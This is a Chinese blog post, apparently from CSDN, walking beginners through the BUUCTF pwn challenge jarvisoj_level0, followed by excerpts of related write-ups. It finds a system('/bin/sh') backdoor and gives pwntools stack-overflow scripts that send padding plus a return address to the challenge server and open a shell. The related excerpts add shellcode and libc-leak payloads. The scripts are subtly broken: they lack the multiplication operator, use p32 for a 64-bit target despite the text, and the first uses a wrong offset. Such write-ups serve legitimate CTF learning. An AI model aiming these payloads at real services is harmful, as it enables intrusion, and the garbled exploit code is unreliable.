pwn-6-jarvisoj_level01

于 2024-10-13 12:21:12 发布
阅读量298 收藏 2
点赞数 10
CC 4.0 BY-SA版权
分类专栏: CTF-pwn-buuctf 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/zhi741/article/details/142896066

之前讲的几篇里我们我们拿到题都是checksec 这次也不意外,先测试一下我们知道了amd64-64-little 这个我之前没有提过这次就提一下 如果显示64 则我们在paylaod的时候p64() 若是32 这p32,相信大家这次能有一个了解

接着IDA查看一番,先shift+F12 又回到了我们熟悉的/bin/sh,还等什么双击呀

双击之后,懵逼了,没有想要的东西然后再双击黄色部分我们跳转一下去看看。

又到了我们熟悉的地方了F5按一下,进去程序里面看看什么情况,我们这是看到一行system(/bin/sh),然后按tab 转到之前的页面,再按空格就会出现下面的图片,我们找的了系统执行的地址,也是我们paylaod最后要到达的位置。

然后我们可以就目前了解构建一下paylaod 

from pwn import *
sh=remote('node5.buuoj.cn',27682)
buf_addr=0x400596
sh.sendline(b'A' 14 + p32(buf_addr))
sh.interactive()

接下来找中间废话代码进行绕过,我们进入主函数寻找write里面有buf函数 ,二进制文件中buf也是一个危险函数,直到现在我们遇到的危险含数有,/bin/sh、gets、buf、 strcpy 。

然后按回到主函数的如图页面,双击黄色部分,危险函数一般就在主函数中出现调用,从这里双击看看是不是脸上洋溢起来了笑容呢,buf 函数 再双击一下

这张图不久告诉了我们废话代码的字节为128+rdp(8)=136于是就有paylaod

paylaod 如下

from pwn import *
sh=remote('node5.buuoj.cn',27682)
buf_addr=0x400596
sh.sendline(b'A' 136 + p32(buf_addr))
sh.interactive()

于是就有了kali的操作,flag值也就出来了

Jarvis OJ level1
Kni9hT's Blog
11-08 649
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
BUUCTF---jarvisoj_level4
qq_33010875的博客
09-26 380
环境:WSL2,ubuntu16.04,python2 checksec文件: 将文件拖入ida 溢出点: 和level3不同的是 read函数之前没有调用write函数,因此要泄露libc的基地址需要用read函数,利用write函数将read函数在got表中的地址泄露出来 payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p(1)+p32(read_got)+p(4) 接受泄露出来的地址 read_addr = u32(io.recv(
PWN_JarvisOJ_Level1
michaelinfinity的博客
03-13 844
首先nc一下 之后我们来看ida反编译 在“Hello,World!\n”之前有一个vulnerable_function,进去之后查看一下这个函数 可以看出来刚刚出现的奇怪的地址是buf的首地址(%p是返回参数地址的),那么我们就要查看一下buf。 从中能看出buf有0x88的字节,并且返回指令在+0004的位置,所以需要填充0x88+4的字节 这个题目中没有syste...
jarvisoj_level1
、moddemod
07-06 416
这题我写这个exp是在ubuntu18的环境下写的,远程和本地的IO交互的数据不太一样,下面的exp在远程可以拿到shell,本地可能需要修改一下… exp from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './level1' p = process(proc_name) # p = remote('node3.buuoj.cn', 29850) elf = ELF(proc_na.
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 209
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 586
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 603
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
BUUCTF jarvisoj_level2 题解
qq_51802916的博客
08-20 602
可以看到程序中已经有了shell的字符串,由于是32位程序,函数的参数通过压栈传递,因此我们可以直接将其地址放在system之后就能够完成参数的传递。而不是使用call指令,因此计算机会将调用函数前栈顶指针指向的地址视为函数的返回地址,因此我们需要在这个地方随便填入一些值,然后在后面填入函数的第一个参数。,因此我们需要填充0x88个字符就能到达ebp的位置,然后再填充4个字符就能到达eip的位置,并且。可以看到是32位程序,栈上开启了不可执行保护,但是没有栈检测标志,推测需要进行缓冲区溢出。
【BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 779
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
[BUUCTF]PWN——jarvisoj_level1
mcmuyanga的博客
11-09 1910
jarvisoj_level1 附件 步骤: 例行检查,32位程序,没有开任何保护 本地运行一下程序,看看大概的情况,可以看到输出了一个地址 32位ida载入,习惯性的检索程序里的字符串,没有发现可以直接利用的gates, main函数开始看程序 function函数 参数buf存在明显的溢出漏洞,程序还将buf参数的地址给了我们 由于没有开启nx,所以我们可以先通过read读入shellcode,然后利用溢出漏洞将ret覆盖为buf参数地址(此时buf里是shellcode)去执行即可
jarvisoj_level01解题
2301_81504456的博客
02-04 702
jarvisoj_level01解题思路,破译,编写脚本。
[BUUCTF-pwn]——jarvisoj_level1
Y_peak的博客
03-17 552
[BUUCTF-pwn]——jarvisoj_level1 题目地址:https://buuoj.cn/challenges#jarvisoj_level1 第一种直接构造shellcode writeup 第二种泄露libc进行操作 from pwn import * from LibcSearcher import * p = remote("node3.buuoj.cn",26361) #p = process("./level1") elf = ELF("./level1") #libc = E
BUUCTF-----jarvisoj_level01
qq_52333044的博客
06-17 267
发现 buf输入是0x80(136) 而read能输入最大字数是0x200(512),可能存在栈溢出漏洞,发现后门函数system("/bin/sh"),然后只要read函数的ret address 为后门函数的地址。然后就file 分析它得到是64位的IDA。查看vulner_function函数。
buuctf pwn jarvisoj_level01
最新发布
m0_74125780的博客
09-27 424
点开vuln函数,看见有read,buf,发现buf占0x80空间,而,read里面有0x200,所以会有溢出。然后有发现有system函数那就简单多了,它的起始地址为0x400596。然后我们将其放入ida64中,按tap键查看源码。这里显示buf的地址为0x80+8,即136。首先,将下载的文件用checksec检查一下。
jarvisoj——[XMAN]level1
王嘟嘟的博客
07-15 496
题目 Wp 先查一下基本的内容 可以看到 RELRO: Partial RELRO就是got表可写的意思,然后ida接着看看源码,这里就是说调用了一个无参的函数 这里看到很明显的是一个溢出,但是这里没有shellcode,就需要自己写一个了 这里可以看到print打印了buf的地址 这里写一个pwntools的脚本 from pwn import * sh = remote("pwn2.jarvisoj.com",9877) shellcode = asm(shellcraft.i386.
JarvisOJ-PWN-Level1
杀生丸?不,其实我要的是桔梗
03-16 921
JarvisOJ-PWN-Level 先checksec一下: 发现NX栈保护没有打开,也就是堆栈代码没有进行保护,那么就就题目很可能就是要输入shellcode在栈里执行吧。 打开IDA分析(32位): 主函数: vulner..fuction()函数: 题目的逻辑是打出buf的首地址然后写入从标准输入100字节给buf。 然后输出Holle world。 我们再看b...
Jarvis OJ level1
九层台
07-06 840
liu@liu-F117-F:~/桌面/oj/level1$ checksec level1 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level1/level1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值